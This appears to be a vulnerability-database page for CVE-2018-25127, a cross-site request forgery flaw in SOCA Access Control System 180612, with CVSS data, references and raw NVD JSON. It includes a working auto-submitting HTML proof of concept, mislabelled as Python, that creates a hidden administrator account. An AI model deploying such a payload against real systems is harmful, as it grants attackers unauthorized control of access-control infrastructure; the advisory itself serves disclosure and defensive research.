CVE-2018-25127

Description

SOCA Access Control System 180612 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that submit forged requests to create admin accounts by tricking logged-in users into visiting a malicious site.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SOCA Access Control System 180612

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CSRF PoC for CVE-2018-25127: Create Admin Account -->
<!-- This PoC demonstrates the CSRF vulnerability in SOCA Access Control System -->
<html>
  <body>
    <h2>SOCA Access Control System - CSRF Exploit (CVE-2018-25127)</h2>
    <p>Target: SOCA Access Control System 180612</p>
    <p>Vulnerability: Cross-Site Request Forgery in admin account creation</p>
    
    <script>history.pushState('', '', '/')</script>
    
    <form action="http://target-server/admin/user/add" method="POST" id="exploitForm">
      <input type="hidden" name="username" value="malicious_admin" />
      <input type="hidden" name="password" value="P@ssw0rd123" />
      <input type="hidden" name="role" value="admin" />
      <input type="hidden" name="action" value="create" />
    </form>
    
    <script>
      // Auto-submit the form when page loads
      document.getElementById('exploitForm').submit();
    </script>
    
    <p>If admin account creation was successful, a new admin user 'malicious_admin' has been created.</p>
    <p>Use credentials: malicious_admin / P@ssw0rd123</p>
  </body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25127
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25127
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25127/
[4] VulDB https://vuldb.com/cve/CVE-2018-25127
[5] http://www.socatech.com
[6] https://www.exploit-db.com/exploits/46834
[7] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25127", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:46.193", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOCA Access Control System 180612 contains a cross-site request forgery vulnerability that allows attackers to perform administrative actions without proper request validation. Attackers can craft malicious web pages that submit forged requests to create admin accounts by tricking logged-in users into visiting a malicious site."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "http://www.socatech.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46834", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}